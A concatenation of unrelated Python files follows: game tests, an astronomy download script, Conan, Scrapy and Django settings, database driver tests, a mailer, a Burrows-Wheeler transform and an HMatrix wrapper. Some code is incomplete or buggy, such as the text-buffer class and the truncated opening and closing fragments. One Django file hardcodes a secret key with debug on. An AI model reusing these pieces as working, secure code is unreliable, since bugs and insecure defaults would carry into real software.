dx, dy = 1.4, -19.7

for I in range(999):
    sx, sy = coll(sx, sy, dx, dy)
    if sy > 0 and abs(sx) <= 0.01:
        print(I)
        break
    mx, my = norm(1, -4*sx/sy)
    d = mx*dx + my*dy
    dx, dy = -dx + 2 * mx * d, -dy + 2 * my * d

import sys

MAX_NUM_STORED_LINES = 200
MAX_NUM_LINES = 10
LINEWIDTH = 80

class CmdText(object):
    """
    Represents a command line text device. Text is split into lines
    corresponding to the linewidth of the device.
    """
    def __init__(self):
        """
        Construct empty object.
        """
        self.num_lines = 0
        self.remaining_lines = MAX_NUM_LINES
        self.lines = []

    def insert(self, string):
        """
        Insert string at the end. This always begins a new line.
        """
        if (self.num_lines >= MAX_NUM_LINES):
            pass
        
        input_num_lines = num_lines(string)

        #if (input_num_lines > self.remaining_lines):
        #    num = self.remaining_lines
        #else:
        #    num = input_num_lines
        num = input_num_lines
        
        new_lines = get_lines(string)

        self.lines += new_lines[-num:]
        self.update_num_lines()
    
    def merge_after(self, obj):
        """
        Merge with another CmdText object by appending the input objects content.
        """
        self.lines 
    
    def strip_lines(self):
        """
        Remove excessive number of lines. This deletes the oldest half.
        """
        if (self.num_lines > MAX_NUM_STORED_LINES):
            for i in range(MAX_NUM_STORED_LINES // 2):
                self.lines.pop(i)
    
    def update_num_lines(self):
        """
        Update the number of lines member.
        """
        self.num_lines = len(self.lines)

    def get_line(self, n):
        """
        Return the line with index n.
        """
        if n < self.num_lines:
            return self.lines[n]
        else:
            raise IndexError("Line index out of range.")
        
    def print_screen(self):
        """
        Return MAX_NUM_LINES lines.
        """
        return self.lines[-MAX_NUM_LINES:]
    
    def __iter__(self):
        """
        Iterator for CmdText object.
        """
        for l in self.lines:
            yield l
    
    def __getitem__(self, ind):
        return self.lines[ind]

def num_lines(string):
    """
    Return number of lines.
    """
    line_list = string.split("\n")
    num = len(line_list)
    for l in line_list:
        num += (len(string) // LINEWIDTH + 1)
    
    return num


def get_lines(string):
    """
    Return list of lines extracted from string.
    """
    line_list = string.split('\n')

    new_list = []
    for l in line_list:
        new_list += [l[i*LINEWIDTH:(i+1)*LINEWIDTH] for i in range(len(l) // LINEWIDTH + 1)]
    
    return new_list

class Command(CmdText):
    def __init__(self, string, rind=None):
        CmdText.__init__(self)
        self.insert(string)

        if (rind is not None):
            self.response = rind
    

class Response(CmdText):
    def __init__(self, string, cind=None):
        CmdText.__init__(self)
        self.insert(string)

        if (cind is not None):
            self.command = cind


class TestCase(object):
    """
    Base class for tests.
    """

    @classmethod
    def run(cls):
        """
        Runs all tests (methods which begin with 'test').
        """
        #print(cls)
        max_len = max([len(a) for a in cls.__dict__])
        for key in cls.__dict__:
            if key.startswith("test"):
                fill = max_len - len(key)
                sys.stdout.write("Testing {} ...{} ".format(key, '.'*fill))
                try:
                    cls.__dict__[key]()
                except:
                    raise
                else:
                    print("Test passed!")
        print("All tests passed!")


class StaticTest(TestCase):
    """
    Tests for static methods.
    """

    def test_get_lines_with_empty_string():
        assert get_lines("") == [""]
    
    def test_get_lines_with_short_string():
        assert len(get_lines("a"*(LINEWIDTH-1))) == 1
    
    def test_get_lines_with_long_string():
        assert len(get_lines("a"*(2*LINEWIDTH-1))) == 2
    
    def test_get_lines_with_very_long_string():
        assert len(get_lines("a"*(4*LINEWIDTH-1))) == 4
    
    def test_get_lines_with_long_text_string():
        text = "This is a test string, which should simulate real text. The command should" \
         + " correctly split this text into two lines."
        LINEWIDTH = 80
        correct_lines = [text[:LINEWIDTH], text[LINEWIDTH:]]
        assert len(get_lines(text)) == len(text) // LINEWIDTH + 1
        assert get_lines(text) == correct_lines
    


class CmdTextTest(object):
    """
    Tests for CmdText class methods.
    """

    pass
"""
Tests for a door card.
"""

import pytest

from onirim import card
from onirim import component
from onirim import core
from onirim import agent


class DoorActor(agent.Actor):
    """
    """
    def __init__(self, do_open):
        self._do_open = do_open

    def open_door(self, content, door_card):
        return self._do_open


DRAWN_CAN_NOT_OPEN = (
    card.Color.red,
    False,
    component.Content(
        undrawn_cards=[],
        hand=[card.key(card.Color.blue)]),
    component.Content(
        undrawn_cards=[],
        hand=[card.key(card.Color.blue)],
        limbo=[card.door(card.Color.red)]),
    )

DRAWN_DO_NOT_OPEN = (
    card.Color.red,
    False,
    component.Content(
        undrawn_cards=[],
        hand=[card.key(card.Color.red)]),
    component.Content(
        undrawn_cards=[],
        hand=[card.key(card.Color.red)],
        limbo=[card.door(card.Color.red)]),
    )

DRAWN_DO_OPEN = (
    card.Color.red,
    True,
    component.Content(
        undrawn_cards=[],
        hand=[
            card.key(card.Color.red),
            card.key(card.Color.red),
            card.key(card.Color.red),
        ]),
    component.Content(
        undrawn_cards=[],
        discarded=[card.key(card.Color.red)],
        hand=[card.key(card.Color.red), card.key(card.Color.red)],
        opened=[card.door(card.Color.red)]),
    )

DRAWN_DO_OPEN_2 = (
    card.Color.red,
    True,
    component.Content(
        undrawn_cards=[],
        hand=[
            card.key(card.Color.blue),
            card.key(card.Color.red),
        ]),
    component.Content(
        undrawn_cards=[],
        discarded=[card.key(card.Color.red)],
        hand=[card.key(card.Color.blue)],
        opened=[card.door(card.Color.red)]),
    )

DRAWN_CASES = [
    DRAWN_CAN_NOT_OPEN,
    DRAWN_DO_NOT_OPEN,
    DRAWN_DO_OPEN,
    DRAWN_DO_OPEN_2,
    ]


@pytest.mark.parametrize(
    "color, do_open, content, content_after",
    DRAWN_CASES)
def test_drawn(color, do_open, content, content_after):
    door_card = card.door(color)
    door_card.drawn(core.Core(DoorActor(do_open), agent.Observer(), content))
    assert content == content_after

### This script fetches level-1 PACS imaging data, using a list generated by the
### archive (in the CSV format), attaches sky coordinates and masks to them
### (by calling the convertL1ToScanam task) and save them to disk in the correct
### format for later use by Scanamorphos.
### See important instructions below.


#######################################################

### This script is part of the Scanamorphos package.

###  HCSS is free software: you can redistribute it and/or modify
###  it under the terms of the GNU Lesser General Public License as
###  published by the Free Software Foundation, either version 3 of
###  the License, or (at your option) any later version.

#######################################################

## Import classes and definitions:
import os
from herschel.pacs.spg.phot import ConvertL1ToScanamTask

#######################################################


## local settings:

dir_root = "/pcdisk/stark/aribas/Desktop/modeling_TDs/remaps_Cha/PACS/scanamorphos/"
path = dir_root +"L1/"

### number of observations:
n_obs = 2


#######################################################

## Do a multiple target search in the archive and use the "save all results as CSV" option.
## --> ascii table 'results.csv' where lines can be edited
## (suppress unwanted observations and correct target names)

## Create the directories contained in the dir_out variables (l. 57)
## before running this script.

#######################################################


## observations:
table_obs = asciiTableReader(file=dir_root+'results_fast.csv', tableType='CSV', skipRows=1)
list_obsids = table_obs[0].data
list_names = table_obs[1].data


for i_obs in range(n_obs):
    ##
    num_obsid = list_obsids[i_obs]
    source = list_names[i_obs]
    source = str.lower(str(source))
    dir_out = path+source+"_processed_obsids"
    # create directory if it does not exist
    if not(os.path.exists(dir_out)):
        os.system('mkdir '+dir_out)
	##
    print ""
    print "Downloading obsid " + `num_obsid`
    obs = getObservation(num_obsid, useHsa=True, instrument="PACS", verbose=True)
    ###
    frames = obs.level1.refs["HPPAVGR"].product.refs[0].product
    convertL1ToScanam(frames, cancelGlitch=1, assignRaDec=1, outDir=dir_out)
    ###
    frames = obs.level1.refs["HPPAVGB"].product.refs[0].product
    convertL1ToScanam(frames, cancelGlitch=1, assignRaDec=1, outDir=dir_out)


### END OF SCRIPT

#######################################################

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import os
from conans.model import Generator
from conans.client.generators import VisualStudioGenerator
from xml.dom import minidom
from conans.util.files import load


class VisualStudioMultiGenerator(Generator):
    template = """<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
    <ImportGroup Label="PropertySheets" >
    </ImportGroup>
    <PropertyGroup Label="UserMacros" />
    <PropertyGroup />
    <ItemDefinitionGroup />
    <ItemGroup />
</Project>
"""

    @property
    def filename(self):
        pass

    @property
    def content(self):
        configuration = str(self.conanfile.settings.build_type)
        platform = {'x86': 'Win32', 'x86_64': 'x64'}.get(str(self.conanfile.settings.arch))
        vsversion = str(self.settings.compiler.version)

        # there is also ClCompile.RuntimeLibrary, but it's handling is a bit complicated, so skipping for now
        condition = " '$(Configuration)' == '%s' And '$(Platform)' == '%s' And '$(VisualStudioVersion)' == '%s' "\
                    % (configuration, platform, vsversion + '.0')

        name_multi = 'conanbuildinfo_multi.props'
        name_current = ('conanbuildinfo_%s_%s_%s.props' % (configuration, platform, vsversion)).lower()

        multi_path = os.path.join(self.output_path, name_multi)
        if os.path.isfile(multi_path):
            content_multi = load(multi_path)
        else:
            content_multi = self.template

        dom = minidom.parseString(content_multi)
        import_node = dom.createElement('Import')
        import_node.setAttribute('Condition', condition)
        import_node.setAttribute('Project', name_current)
        import_group = dom.getElementsByTagName('ImportGroup')[0]
        children = import_group.getElementsByTagName("Import")
        for node in children:
            if name_current == node.getAttribute("Project") and condition == node.getAttribute("Condition"):
                break
        else:
            import_group.appendChild(import_node)
        content_multi = dom.toprettyxml()
        content_multi = "\n".join(line for line in content_multi.splitlines() if line.strip())

        vs_generator = VisualStudioGenerator(self.conanfile)
        content_current = vs_generator.content

        return {name_multi: content_multi, name_current: content_current}

# Scrapy settings for helloscrapy project
#
# For simplicity, this file contains only the most important settings by
# default. All the other settings are documented here:
#
#     http://doc.scrapy.org/en/latest/topics/settings.html
#

BOT_NAME = 'helloscrapy'

SPIDER_MODULES = ['helloscrapy.spiders']
NEWSPIDER_MODULE = 'helloscrapy.spiders'

# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'helloscrapy (+http://www.yourdomain.com)'

DOWNLOAD_DELAY = 3
ROBOTSTXT_OBEY = True

"""
Django settings for djangoApp project.

Generated by 'django-admin startproject' using Django 1.10.5.

For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/

For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""

import os

# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))


# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'r&j)3lay4i$rm44n%h)bsv_q(9ysqhl@7@aibjm2b=1)0fag9n'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

ALLOWED_HOSTS = []


# Application definition

INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
]

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

ROOT_URLCONF = 'djangoApp.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

WSGI_APPLICATION = 'djangoApp.wsgi.application'


# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases

DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}


# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators

AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]


# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/

LANGUAGE_CODE = 'en-us'

TIME_ZONE = 'UTC'

USE_I18N = True

USE_L10N = True

USE_TZ = True


# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/

STATIC_URL = '/static/'

import os


# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))


# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = os.environ['HERTZ_SECRET_KEY']

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = os.environ['HERTZ_DEBUG'] != 'False'

ALLOWED_HOSTS = ['*' if DEBUG else os.environ['HERTZ_HOST']]


# Application definition

INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'widget_tweaks',
    'attendance',
]

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

ROOT_URLCONF = 'hertz.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [
            os.path.join(BASE_DIR, 'templates'),
        ],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

WSGI_APPLICATION = 'hertz.wsgi.application'


# Database

if 'DATABASE_HOST' in os.environ:
    DATABASES = {
        'default': {
            'ENGINE': 'django.db.backends.postgresql',
            'NAME': 'postgres',
            'USER': os.environ['POSTGRES_USER'],
            'PASSWORD': os.environ['POSTGRES_PASSWORD'],
            'HOST': os.environ['DATABASE_HOST'],
            'PORT': 5432,
        }
    }
else:
    DATABASES = {
        'default': {
            'ENGINE': 'django.db.backends.sqlite3',
            'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
        }
    }

# Password validation

AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]


# Internationalization

LANGUAGE_CODE = 'en-us'

TIME_ZONE = 'America/Sao_Paulo'

USE_I18N = True

USE_L10N = True

USE_TZ = True


# Static files (CSS, JavaScript, Images)

STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')


# STATICFILES_DIRS = [
#     os.path.join(BASE_DIR, 'static'),
# ]

LOGIN_REDIRECT_URL = '/'
LOGIN_URL = '/login'

import re
import warnings

import ctds

from .base import TestExternalDatabase
from .compat import PY3, PY36, unicode_


class TestTdsParameter(TestExternalDatabase):

    def test___doc__(self):
        self.assertEqual(
            ctds.Parameter.__doc__,
            '''\
Parameter(value, output=False)

Explicitly define a parameter for :py:meth:`.callproc`,
:py:meth:`.execute`, or :py:meth:`.executemany`. This is necessary
to indicate whether a parameter is *SQL* `OUTPUT` or `INPUT/OUTPUT`
parameter.

:param object value: The parameter's value.
:param bool output: Is the parameter an output parameter.
'''
        )

    def test_parameter(self):
        param1 = ctds.Parameter(b'123', output=True)
        self.assertEqual(param1.value, b'123')
        self.assertTrue(isinstance(param1, ctds.Parameter))

        param2 = ctds.Parameter(b'123')
        self.assertEqual(param1.value, b'123')
        self.assertEqual(type(param1), type(param2))
        self.assertTrue(isinstance(param2, ctds.Parameter))

    def test___repr__(self):
        for parameter, expected in (
                (
                    ctds.Parameter(b'123', output=True),
                    "ctds.Parameter(b'123', output=True)" if PY3 else "ctds.Parameter('123', output=True)"
                ),
                (
                    ctds.Parameter(unicode_('123'), output=False),
                    "ctds.Parameter('123')" if PY3 else "ctds.Parameter(u'123')"
                ),
                (
                    ctds.Parameter(None),
                    "ctds.Parameter(None)"
                ),
                (
                    ctds.Parameter(ctds.SqlVarBinary(b'4321', size=10)),
                    "ctds.Parameter(ctds.SqlVarBinary(b'4321', size=10))"
                    if PY3 else
                    "ctds.Parameter(ctds.SqlVarBinary('4321', size=10))"
                )
        ):
            self.assertEqual(repr(parameter), expected)

    def _test__cmp__(self, __cmp__, expected, oper):
        cases = (
            (ctds.Parameter(b'1234'), ctds.Parameter(b'123')),
            (ctds.Parameter(b'123'), ctds.Parameter(b'123')),
            (ctds.Parameter(b'123'), ctds.Parameter(b'123', output=True)),
            (ctds.Parameter(b'123'), ctds.Parameter(b'1234')),
            (ctds.Parameter(b'123'), b'123'),
            (ctds.Parameter(b'123'), ctds.Parameter(123)),
            (ctds.Parameter(b'123'), unicode_('123')),
            (ctds.Parameter(b'123'), ctds.SqlBinary(None)),
            (ctds.Parameter(b'123'), 123),
            (ctds.Parameter(b'123'), None),
        )

        for index, args in enumerate(cases):
            operation = '[{0}]: {1} {2} {3}'.format(index, repr(args[0]), oper, repr(args[1]))
            if expected[index] == TypeError:
                try:
                    __cmp__(*args)
                except TypeError as ex:
                    regex = (
                        r"'{0}' not supported between instances of '[^']+' and '[^']+'".format(oper)
                        if not PY3 or PY36
                        else
                        r'unorderable types: \S+ {0} \S+'.format(oper)
                    )
                    self.assertTrue(re.match(regex, str(ex)), ex)
                else:
                    self.fail('{0} did not fail as expected'.format(operation)) # pragma: nocover
            else:
                self.assertEqual(__cmp__(*args), expected[index], operation)

    def test___cmp__eq(self):
        self._test__cmp__(
            lambda left, right: left == right,
            (
                False,
                True,
                True,
                False,
                True,
                False,
                not PY3,
                False,
                False,
                False,
            ),
            '=='
        )

    def test___cmp__ne(self):
        self._test__cmp__(
            lambda left, right: left != right,
            (
                True,
                False,
                False,
                True,
                False,
                True,
                PY3,
                True,
                True,
                True,
            ),
            '!='
        )

    def test___cmp__lt(self):
        self._test__cmp__(
            lambda left, right: left < right,
            (
                False,
                False,
                False,
                True,
                False,
                TypeError if PY3 else False,
                TypeError if PY3 else False,
                TypeError if PY3 else False,
                TypeError if PY3 else False,
                TypeError if PY3 else False,
            ),
            '<'
        )

    def test___cmp__le(self):
        self._test__cmp__(
            lambda left, right: left <= right,
            (
                False,
                True,
                True,
                True,
                True,
                TypeError if PY3 else False,
                TypeError if PY3 else True,
                TypeError if PY3 else False,
                TypeError if PY3 else False,
                TypeError if PY3 else False,
            ),
            '<='
        )

    def test___cmp__gt(self):
        self._test__cmp__(
            lambda left, right: left > right,
            (
                True,
                False,
                False,
                False,
                False,
                TypeError if PY3 else True,
                TypeError if PY3 else False,
                TypeError if PY3 else True,
                TypeError if PY3 else True,
                TypeError if PY3 else True,
            ),
            '>'
        )

    def test___cmp__ge(self):
        self._test__cmp__(
            lambda left, right: left >= right,
            (
                True,
                True,
                True,
                False,
                True,
                TypeError if PY3 else True,
                TypeError if PY3 else True,
                TypeError if PY3 else True,
                TypeError if PY3 else True,
                TypeError if PY3 else True,
            ),
            '>='
        )

    def test_typeerror(self):
        for case in (None, object(), 123, 'foobar'):
            self.assertRaises(TypeError, ctds.Parameter, case, b'123')

        self.assertRaises(TypeError, ctds.Parameter)
        self.assertRaises(TypeError, ctds.Parameter, output=False)

        for case in (None, object(), 123, 'foobar'):
            self.assertRaises(TypeError, ctds.Parameter, b'123', output=case)

    def test_reuse(self):
        with self.connect() as connection:
            with connection.cursor() as cursor:
                for value in (
                        None,
                        123456,
                        unicode_('hello world'),
                        b'some bytes',
                ):
                    for output in (True, False):
                        parameter = ctds.Parameter(value, output=output)
                        for _ in range(0, 2):
                            # Ignore warnings generated due to output parameters
                            # used with result sets.
                            with warnings.catch_warnings(record=True):
                                cursor.execute(
                                    '''
                                    SELECT :0
                                    ''',
                                    (parameter,)
                                )
                                self.assertEqual(
                                    [tuple(row) for row in cursor.fetchall()],
                                    [(value,)]
                                )

import copy

import pytest

from peek.line import InvalidIpAddressException, Line, InvalidStatusException

# 127.0.0.1 - - [01/Jan/1970:00:00:01 +0000] "GET / HTTP/1.1" 200 193 "-" "Python"
test_line_contents = {
    'ip_address': '127.0.0.1',
    'timestamp':  '[01/Jan/1970:00:00:01 +0000]',
    'verb':       'GET',
    'path':       '/',
    'status':     '200',
    'size':       '193',
    'referrer':   '-',
    'user_agent': 'Python'
}


def get_updated_line_contents(updates=None):
    test_contents = copy.deepcopy(test_line_contents)
    if updates is not None:
        test_contents.update(updates)
    return test_contents


test_line = Line(line_contents=test_line_contents)


class TestLineInstantiation:
    @pytest.mark.parametrize('expected,actual', [
        ('127.0.0.1', test_line.ip_address),
        (1, test_line.timestamp),
        ('GET', test_line.verb),
        ('/', test_line.path),
        (200, test_line.status),
        (193, test_line.byte_count),
        ('-', test_line.referrer),
        ('Python', test_line.user_agent)
    ])
    def test_retrieval(self, expected, actual):
        assert expected == actual


class TestLineExceptions:
    def test_passing_invalid_ip_address_throws_exception(self):
        with pytest.raises(InvalidIpAddressException):
            line = Line(line_contents=get_updated_line_contents({'ip_address': 'foobar'}))

    def test_passing_non_parseable_status_throws_exception(self):
        with pytest.raises(InvalidStatusException):
            Line(line_contents=get_updated_line_contents({'status': 'foobar'}))

import logging
import requests
from django.conf import settings
from django.contrib.sites.models import Site
from django.core.mail import EmailMultiAlternatives
from django.template.loader import get_template
from django.utils import timezone

from invitations.models import Invitation

logger = logging.getLogger('email')
sentry = logging.getLogger('sentry')

def send_invite(message):
    try:
        invite = Invitation.objects.get(
            id=message.get('id'),
            status__in=[Invitation.PENDING, Invitation.ERROR],
        )
    except Invitation.DoesNotExist:
        sentry.error("Invitation to send not found", exc_info=True, extra={'message': message})
        return
    invite.status = Invitation.PROCESSING
    invite.save()
    context = {
        'invite': invite,
        'domain': Site.objects.get_current().domain,
    }
    subject = "[ContactOtter] Invitation to join ContactOtter from %s" % (invite.sender)
    if invite.book:
        subject = "[ContactOtter] Invitation to share %s's contact book" % (invite.sender)
    txt = get_template('email/invitation.txt').render(context)
    html = get_template('email/invitation.html').render(context)
    try:
        message = EmailMultiAlternatives(
            subject=subject,
            body=txt,
            from_email="ContactOtter <invites@contactotter.com>",
            to=[invite.email,],
        )
        message.attach_alternative(html, "text/html")
        message.send()
        invite.status = Invitation.SENT
        invite.sent = timezone.now()
        invite.save()
    except:
        sentry.exception('Problem sending invite', exc_info=True, extra={'invite_id': invite.id})
        invite.status = Invitation.ERROR
        invite.save()


def burrows_wheeler(text):
    """Calculates the burrows wheeler transform of <text>.

    returns the burrows wheeler string and the suffix array indices
    The text is assumed to not contain the character $"""

    text += "$"
    all_permutations = []
    for i in range(len(text)):
        all_permutations.append((text[i:] + text[:i],i))

    all_permutations.sort()
    bw_l = [] # burrows wheeler as list
    sa_i = [] # suffix array indices

    for w,j in all_permutations:
        bw_l.append(w[-1])
        sa_i.append(j)

    return "".join(bw_l), sa_i

#!/usr/bin/env python
# coding: utf-8

import os,sys
import ctypes
import numpy as np
from .hmatrix import _C_HMatrix, HMatrix


class _C_MultiHMatrix(ctypes.Structure):
    """Holder for the raw data from the C++ code."""
    pass


class AbstractMultiHMatrix:
    """Common code for the two actual MultiHMatrix classes below."""

    ndim = 2  # To mimic a numpy 2D array

    def __init__(self, c_data: _C_MultiHMatrix, **params):
        # Users should use one of the two constructors below.

        self.c_data = c_data
        self.shape = (self.lib.multi_nbrows(c_data), self.lib.multi_nbcols(c_data))
        self.size = self.lib.nbhmats(c_data)


        self.lib.getHMatrix.restype=ctypes.POINTER(_C_HMatrix)
        self.lib.getHMatrix.argtypes=[ctypes.POINTER(_C_MultiHMatrix), ctypes.c_int]

        self.hmatrices = []
        for l in range(0,self.size):
            c_data_hmatrix = self.lib.getHMatrix(self.c_data,l)
            self.hmatrices.append(HMatrix(c_data_hmatrix,**params))


        self.params = params.copy()

    @classmethod
    def from_coefs(cls, getcoefs, nm, points_target, points_source=None, **params):
        """Construct an instance of the class from a evaluation function.

        Parameters
        ----------
        getcoefs: Callable
            A function evaluating an array of matrices at given coordinates.
        points_target: np.ndarray of shape (N, 3)
            The coordinates of the target points. If points_source=None, also the coordinates of the target points
        points_source: np.ndarray of shape (N, 3)
            If not None; the coordinates of the source points.
        epsilon: float, keyword-only, optional
            Tolerance of the Adaptive Cross Approximation
        eta: float, keyword-only, optional
            Criterion to choose the blocks to compress
        minclustersize: int, keyword-only, optional
            Minimum shape of a block
        maxblocksize: int, keyword-only, optional
            Maximum number of coefficients in a block

        Returns
        -------
        MultiHMatrix or ComplexMultiHMatrix
        """
        # Set params.
        cls._set_building_params(**params)
        
        # Boilerplate code for Python/C++ interface.
        _getcoefs_func_type = ctypes.CFUNCTYPE(None, ctypes.c_int, ctypes.c_int, ctypes.POINTER(ctypes.c_double))
        if points_source is None:
            cls.lib.MultiHMatrixCreateSym.restype = ctypes.POINTER(_C_MultiHMatrix)
            cls.lib.MultiHMatrixCreateSym.argtypes = [
                np.ctypeslib.ndpointer(dtype=np.float64, ndim=2, flags='C_CONTIGUOUS'),
                ctypes.c_int,
                _getcoefs_func_type,
                ctypes.c_int
            ]

            # Call the C++ backend.
            c_data = cls.lib.MultiHMatrixCreateSym(points_target, points_target.shape[0], _getcoefs_func_type(getcoefs),nm)

        else:
            cls.lib.MultiHMatrixCreate.restype = ctypes.POINTER(_C_MultiHMatrix)
            cls.lib.MultiHMatrixCreate.argtypes = [
                np.ctypeslib.ndpointer(dtype=np.float64, ndim=2, flags='C_CONTIGUOUS'),
                ctypes.c_int,
                np.ctypeslib.ndpointer(dtype=np.float64, ndim=2, flags='C_CONTIGUOUS'),
                ctypes.c_int,
                _getcoefs_func_type,
                ctypes.c_int
            ]

            # Call the C++ backend.      
            c_data = cls.lib.MultiHMatrixCreate(points_target,points_target.shape[0],points_source, points_source.shape[0], _getcoefs_func_type(getcoefs),nm)

        return cls(c_data, **params)


    @classmethod
    def from_submatrices(cls, getsubmatrix, nm, points_target, points_source=None, **params):
        """Construct an instance of the class from a evaluation function.

        Parameters
        ----------
        points: np.ndarray of shape (N, 3)
            The coordinates of the points.
        getsubmatrix: Callable
            A function evaluating the matrix in a given range.
        epsilon: float, keyword-only, optional
            Tolerance of the Adaptive Cross Approximation
        eta: float, keyword-only, optional
            Criterion to choose the blocks to compress
        minclustersize: int, keyword-only, optional
            Minimum shape of a block
        maxblocksize: int, keyword-only, optional
            Maximum number of coefficients in a block

        Returns
        -------
        HMatrix or ComplexHMatrix
        """
        # Set params.
        cls._set_building_params(**params)

        # Boilerplate code for Python/C++ interface.
        _getsumatrix_func_type = ctypes.CFUNCTYPE(
                None, ctypes.POINTER(ctypes.c_int), ctypes.POINTER(ctypes.c_int),
                ctypes.c_int, ctypes.c_int, ctypes.POINTER(ctypes.c_double)
            )
        if points_source is None:
            cls.lib.MultiHMatrixCreatewithsubmatSym.restype = ctypes.POINTER(_C_MultiHMatrix)
            cls.lib.MultiHMatrixCreatewithsubmatSym.argtypes = [
                np.ctypeslib.ndpointer(dtype=np.float64, ndim=2, flags='C_CONTIGUOUS'),
                ctypes.c_int,
                _getsumatrix_func_type,
                ctypes.c_int
            ]

            # Call the C++ backend.
            c_data = cls.lib.MultiHMatrixCreatewithsubmatSym(points_target, points_target.shape[0], _getsumatrix_func_type(getsubmatrix),nm)
        else:
            cls.lib.MultiHMatrixCreatewithsubmat.restype = ctypes.POINTER(_C_MultiHMatrix)
            cls.lib.MultiHMatrixCreatewithsubmat.argtypes = [
                np.ctypeslib.ndpointer(dtype=np.float64, ndim=2, flags='C_CONTIGUOUS'),
                ctypes.c_int,
                np.ctypeslib.ndpointer(dtype=np.float64, ndim=2, flags='C_CONTIGUOUS'),
                ctypes.c_int,
                _getsumatrix_func_type,
                ctypes.c_int
            ]

            # Call the C++ backend.
            c_data = cls.lib.MultiHMatrixCreatewithsubmat(points_target,points_target.shape[0],points_source, points_source.shape[0], _getsumatrix_func_type(getsubmatrix),nm)

        return cls(c_data, **params)

    @classmethod
    def _set_building_params(cls, *, eta=None, minclustersize=None, epsilon=None, maxblocksize=None):
        """Put the parameters in the C++ backend."""
        if epsilon is not None:
            cls.lib.setepsilon.restype = None
            cls.lib.setepsilon.argtypes = [ ctypes.c_double ]
            cls.lib.setepsilon(epsilon)

        if eta is not None:
            cls.lib.seteta.restype = None
            cls.lib.seteta.argtypes = [ ctypes.c_double ]
            cls.lib.seteta(eta)

        if minclustersize is not None:
            cls.lib.setminclustersize.restype = None
            cls.lib.setminclustersize.argtypes = [ ctypes.c_int ]
            cls.lib.setminclustersize(minclustersize)

        if maxblocksize is not None:
            cls.lib.setmaxblocksize.restype = None
            cls.lib.setmaxblocksize.argtypes = [ ctypes.c_int ]
            cls.lib.setmaxblocksize(maxblocksize)

    def __str__(self):
        return f"{self.__class__.__name__}(shape={self.shape})"

    def __getitem__(self, key):

        # self.lib.getHMatrix.restype=ctypes.POINTER(_C_HMatrix)
        # self.lib.getHMatrix.argtypes=[ctypes.POINTER(_C_MultiHMatrix), ctypes.c_int]
        # c_data_hmatrix = self.lib.getHMatrix(self.c_data,key)
        # return HMatrix(c_data_hmatrix,**self.params)
        return self.hmatrices[key]

    def matvec(self, l , vector):
        """Matrix-vector product (interface for scipy iterative solvers)."""

